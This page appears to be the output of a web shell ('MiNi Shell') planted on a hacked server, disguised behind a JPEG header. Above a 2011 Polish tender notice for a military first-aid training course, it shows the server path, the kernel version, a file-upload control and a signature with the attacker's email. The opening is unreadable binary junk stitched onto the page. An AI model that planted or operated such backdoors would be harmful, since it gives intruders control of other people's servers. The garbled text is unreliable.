JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110405/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110405/64644-N-2011.html

<p class="kh_header"><b>Kielce: Przeprowadzenie kursu specjalistycznego dla Centralnej Grupy Wsparcia Współpracy Cywilno - Wojskowej Zasady udzielania pierwszej pomocy przedmedycznej</b><br>
<b>Numer ogłoszenia: 64644 - 2011; data zamieszczenia: 05.04.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Centrum Szkolenia na Potrzeby Sił Pokojowych , ul. Wojska Polskiego 300, 25-205 Kielce, woj. brak, tel. 041 3174300, 2786340, faks 041 3174330, 2786330.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.csnpsp.wp.mil.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja rządowa centralna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przeprowadzenie kursu specjalistycznego dla Centralnej Grupy Wsparcia Współpracy Cywilno - Wojskowej Zasady udzielania pierwszej pomocy przedmedycznej.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zamawiający dopuszcza możliwość powierzenia przez Wykonawcę wykonania części lub całości zamówienia podwykonawcom. W takim przypadku Wykonawca zobowiązany jest do wskazania w  swojej ofercie części zamówienia (zakresu), których wykonanie zamierza powierzyć podwykonawcom.
 
Zakres  przedmiotu zamówienia.
Zagadnienia ogólne:
1.Pierwsza pomoc podstawowa i rozszerzona w kontekście pola walki.
2.Podstawowe zabiegi resuscytacyjne u dorosłych - International Trauma Life Support(ITLS).i AED (Automated External Defibrylation).
3.Segregacja ofiar pola walki.
Założenia  merytoryczne :
1.Zajęcia dotyczące zasad pierwszej pomocy przedmedycznej realizowane powinny być przez wykładowców  i  instruktorów o specjalizacji z medycyny ratunkowej, absolwentów studiów na kierunku ratownictwo medyczne lub szkoły policealnej o tym kierunku  oraz co najmniej jednego  lekarza posiadającego odpowiednią  specjalizację  . 
2.Wykłady teoretyczne  mogą być prowadzone przez jednego wykładowcę. Standard szkolenia  praktycznego: do 9 osób na 1 instruktora.
3.Po zaliczeniu szkolenia każdy uczestnik otrzyma Certyfikat Europejskiej i Polskiej Rady Resuscytacji.
4.Prezentowane treści są zgodne z aktualnymi wytycznymi Polskiej Rady Resuscytacji.
5.Program zajęć kursu obejmować będzie także naukę obsługi automatycznego defibrylatora (BLS-AED).
6.Przeprowadzający kursy musi  posiadać i udostępnić do szkolenia kursu niezbędne elementy szkoleniowe wymagane do prowadzenia wykładów, ćwiczeń, pokazów edukacyjnych oraz egzaminowania, które są przedstawiane na wykładach oraz podczas ćwiczeń praktycznych.  
7.Przeprowadzający  kurs winni dostosowywać przedstawiane treści do możliwych realnych sytuacji zachodzących w strefach konfliktów zbrojnych.
8.W trakcie prowadzenia zajęć z pierwszej pomocy przedmedycznej pożądane jest wykorzystanie w szkoleniu indywidualnego wyposażenia osobistego żołnierza.
9.Eksponowane powinny być informacje wpływające na poziom bezpieczeństwa osób udających się w rejony konfliktów zbrojnych, zwłaszcza personelu wojskowego (urazy bojowe).

Wymagania stawiane wykonawcy:      
1)Ilość zajęć oraz terminy  realizacji: 
31.05.2011r. - 01.06.2011r. (dwa dni szkoleniowe, 14 godzin lekcyjnych), oraz 
11.10.2011 r. -12.10.2011 r. (dwa dni szkoleniowe, 14 godzin lekcyjnych).
2)Uczestnicy: grupa kursantów 18 osób, żołnierze zawodowi CGWWC-W.
3)Zajęcia będą przeprowadzone z wykorzystaniem pokazów multimedialnych, w tym kopie dla Zamawiającego oraz drukowanych materiałów szkoleniowych dla każdego uczestnika. 
4)Oferent przygotowuje na swój koszt pokazy multimedialne, materiały szkoleniowe dla każdego z 
uczestników dostarczone na siedem (7) dni  przed rozpoczęciem kursu.
5)Oferent przygotowuje na swój koszt certyfikaty ukończenia kursu w języku polskim i angielskim.
6)Kwalifikacje poszczególnych instruktorów, lektorów:
a)lekarz - specjalista medycyny ratunkowej, a do 31.12.2020r. także lekarz posiadający specjalizację z niektórych innych działów medycyny;
b)pielęgniarka - specjalista z pielęgniarstwa ratunkowego, niektórych innych działów lub kurs kwalifikacyjny;
c)ratownik medyczny- absolwent studiów na kierunku ratownictwo medyczne lub szkoły policealnej o tym kierunku;
d)ratownik - osoba zatrudniona lub pełniąca służbę w jednostkach współpracujących z systemem, która ukończyła kurs kwalifikowanej pierwszej pomocy.
7)Oferent przedstawia w złożonej ofercie w formie pisemnej wykaz osób prowadzących zajęcia  podczas kursu zawierając jednocześnie informacje na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia. 
8)Lektor odpowiada  za: prowadzenie zajęć zgodne z wymaganiami programowymi, które obejmują wyżej przedstawiony zakres tematyczny..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.56.20.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 31.05.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Na potwierdzenie tego warunku należy złożyć oświadczenie.
Opis sposobu dokonania oceny spełnienia warunków udziału w postępowaniu.
1)Zamawiający oceni spełnienie warunków udziału w postępowaniu na podstawie złożonych przez Wykonawcę  dokumentów i oświadczeń żądanych przez Zamawiającego w niniejszym postępowaniu, wymienionych  w cz. VI niniejszej specyfikacji, według reguły spełnia - nie spełnia.
2)Wykonawcy, którzy nie wykażą spełnienia warunków udziału w postępowaniu, podlegać będą  wykluczeniu z udziału w postępowaniu.
3)Zamawiający udzieli zamówienia Wykonawcy, którego oferta będzie zgodna co do sposobu jej przygotowania, oferowanego przedmiotu zamówienia i spełnienia warunków udziału w postępowaniu ze wszystkimi wymaganiami przedstawionymi  w niniejszej specyfikacji  oraz  zostanie  oceniona jako najkorzystniejsza w oparciu o podane w specyfikacji kryterium oceny.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia, że Wykonawca posiada niezbędną wiedzę i doświadczenie do wykonania  zamówienia, do oferty należy dołączyć wykaz przynajmniej dwóch przeprowadzonych usług szkolenia dotyczącego zasad udzielania pierwszej pomocy przedmedycznej zrealizowanych w kresie ostatnich trzech lat, przed upływem terminu składania ofert z podaniem ich  wartości  brutto, daty i miejsca wykonania   -  z wykorzystaniem wzoru  załącznik nr 4. 
Do wykazu należy załączyć dokumenty potwierdzające, że usługi te zostały wykonane należycie.
Opis sposobu dokonania oceny spełnienia warunków udziału w postępowaniu.
1)Zamawiający oceni spełnienie warunków udziału w postępowaniu na podstawie złożonych przez Wykonawcę  dokumentów i oświadczeń żądanych przez Zamawiającego w niniejszym postępowaniu, wymienionych  w cz. VI niniejszej specyfikacji, według reguły spełnia - nie spełnia.
2)Wykonawcy, którzy nie wykażą spełnienia warunków udziału w postępowaniu, podlegać będą  wykluczeniu z udziału w postępowaniu.
3)Zamawiający udzieli zamówienia Wykonawcy, którego oferta będzie zgodna co do sposobu jej przygotowania, oferowanego przedmiotu zamówienia i spełnienia warunków udziału w postępowaniu ze wszystkimi wymaganiami przedstawionymi  w niniejszej specyfikacji  oraz  zostanie  oceniona jako najkorzystniejsza w oparciu o podane w specyfikacji kryterium oceny.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Na potwierdzenie tego warunku należy złożyć oświadczenie.
Opis sposobu dokonania oceny spełnienia warunków udziału w postępowaniu.
1)Zamawiający oceni spełnienie warunków udziału w postępowaniu na podstawie złożonych przez Wykonawcę  dokumentów i oświadczeń żądanych przez Zamawiającego w niniejszym postępowaniu, wymienionych  w cz. VI niniejszej specyfikacji, według reguły spełnia - nie spełnia.
2)Wykonawcy, którzy nie wykażą spełnienia warunków udziału w postępowaniu, podlegać będą  wykluczeniu z udziału w postępowaniu.
3)Zamawiający udzieli zamówienia Wykonawcy, którego oferta będzie zgodna co do sposobu jej przygotowania, oferowanego przedmiotu zamówienia i spełnienia warunków udziału w postępowaniu ze wszystkimi wymaganiami przedstawionymi  w niniejszej specyfikacji  oraz  zostanie  oceniona jako najkorzystniejsza w oparciu o podane w specyfikacji kryterium oceny.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia, że Wykonawca dysponuje odpowiednimi osobami zdolnymi do  wykonania   zamówienia  do oferty należy dołączyć wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia (prowadzących zajęcia),  wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia  niezbędnych do wykonania  zamówienia  -  z wykorzystaniem wzoru  załącznik nr5.
 Opis sposobu dokonania oceny spełnienia warunków udziału w postępowaniu.
1)Zamawiający oceni spełnienie warunków udziału w postępowaniu na podstawie złożonych przez Wykonawcę  dokumentów i oświadczeń żądanych przez Zamawiającego w niniejszym postępowaniu, wymienionych  w cz. VI niniejszej specyfikacji, według reguły spełnia - nie spełnia.
2)Wykonawcy, którzy nie wykażą spełnienia warunków udziału w postępowaniu, podlegać będą  wykluczeniu z udziału w postępowaniu.
3)Zamawiający udzieli zamówienia Wykonawcy, którego oferta będzie zgodna co do sposobu jej przygotowania, oferowanego przedmiotu zamówienia i spełnienia warunków udziału w postępowaniu ze wszystkimi wymaganiami przedstawionymi  w niniejszej specyfikacji  oraz  zostanie  oceniona jako najkorzystniejsza w oparciu o podane w specyfikacji kryterium oceny.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Na potwierdzenie tego warunku należy złożyć oświadczenie.
Opis sposobu dokonania oceny spełnienia warunków udziału w postępowaniu.
1)Zamawiający oceni spełnienie warunków udziału w postępowaniu na podstawie złożonych przez Wykonawcę  dokumentów i oświadczeń żądanych przez Zamawiającego w niniejszym postępowaniu, wymienionych  w cz. VI niniejszej specyfikacji, według reguły spełnia - nie spełnia.
2)Wykonawcy, którzy nie wykażą spełnienia warunków udziału w postępowaniu, podlegać będą  wykluczeniu z udziału w postępowaniu.
3)Zamawiający udzieli zamówienia Wykonawcy, którego oferta będzie zgodna co do sposobu jej przygotowania, oferowanego przedmiotu zamówienia i spełnienia warunków udziału w postępowaniu ze wszystkimi wymaganiami przedstawionymi  w niniejszej specyfikacji  oraz  zostanie  oceniona jako najkorzystniejsza w oparciu o podane w specyfikacji kryterium oceny.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>9.W przypadku , kiedy Wykonawcę-osobę upoważnioną prawnie do podpisywania oferty reprezentuje pełnomocnik ,Wykonawca zobowiązany jest złożyć pełnomocnictwo upoważniające do podpisywania oferty i wykonywania czynności w postępowaniu w imieniu Wykonawcy. Jeżeli pełnomocnik w imieniu Wykonawcy podpisuje także oświadczenie wiedzy o spełnieniu przez Wykonawcę warunków udziału w postępowaniu oraz oświadczenie  o braku podstaw do wykluczenia Wykonawcy z postępowania, udzielone pełnomocnictwo ma zawierać upoważnienie do złożenia takiego oświadczenia.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.csnpsp.wp.mil.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Centrum Szkolenia Na Potrzeby Sił Pokojowych 25-205 Kielce, ul. Wojaka Polskiego 300,budynek Komendy Ip, pok. 107.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.04.2011 godzina 11:45, miejsce: Centrum Szkolenia Na Potrzeby Sił Pokojowych 25-205 Kielce, ul. Wojaka Polskiego 300, Kancelaria Jawna /czynna od poniedziałku do piątku w godz.: od 7:30 do 15:30 /.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com